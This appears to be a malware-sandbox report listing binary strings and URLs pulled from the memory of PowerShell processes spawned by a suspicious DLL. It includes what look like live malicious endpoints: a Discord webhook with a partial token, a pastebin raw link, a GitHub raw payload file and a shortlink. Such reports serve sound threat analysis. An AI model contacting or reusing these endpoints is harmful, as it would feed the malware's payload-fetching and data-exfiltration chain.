Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbHF source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 364e35\System.Management.Automation.pdbT source: powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4Gm source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3056953361.00000242CC694000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000006.00000002.2996314232.00000276F7C08000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdbR source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb^ source: powershell.exe, 00000007.00000002.3027895006.000002271A196000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: CallSite.Target.pdbz* source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000018.00000002.3196743622.00000223CF913000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb# source: powershell.exe, 00000018.00000002.3188775271.00000223CF58E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbX source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automationib.pdb source: powershell.exe, 00000008.00000002.2572094402.00000242B23BB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbs source: powershell.exe, 00000008.00000002.2572094402.00000242B2414000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32x source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ib.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb91? source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\dll\mscorlib.pdbe source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll |
Source: | Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdbI3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_` source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC:\W source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb^ source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbata\ source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: b.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001C.00000002.3250944670.0000025E7D907000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ement.Automation.pdbt source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: -C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll |
Source: | Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC666000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb9$M source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A4B5000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F75000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbe089Z source: powershell.exe, 00000018.00000002.3192927958.00000223CF610000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516094783.00000278B4203000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF86D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb!3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbH$- source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrS source: powershell.exe, 00000018.00000002.3196743622.00000223CF8EC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdbjk source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb9dll source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb` source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbB source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000007.00000002.3055012745.000002271A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m |
Source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mT |
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com |
Source: powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com |
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2 |
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubuserconte |
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com |
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
Source: powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt2 |
Source: powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65945000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000006.00000002.2569213401.0000027680225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768160B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768129A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227021F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227032F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com |
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com/yeykydun |
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000001C.00000002.3255147271.0000025E7D9E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B748C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6591E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6590B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C5B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com |
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/128545359042878 |
Source: powershell.exe, 00000006.00000002.2569213401.0000027681730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B59D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D8A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7FC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ |
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6648C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6646D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66469000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66486000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ |
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000006.00000002.2569213401.000002768089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227028F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com |
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sA04Mwk2 |
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercont |
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com |
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D7C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6635B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
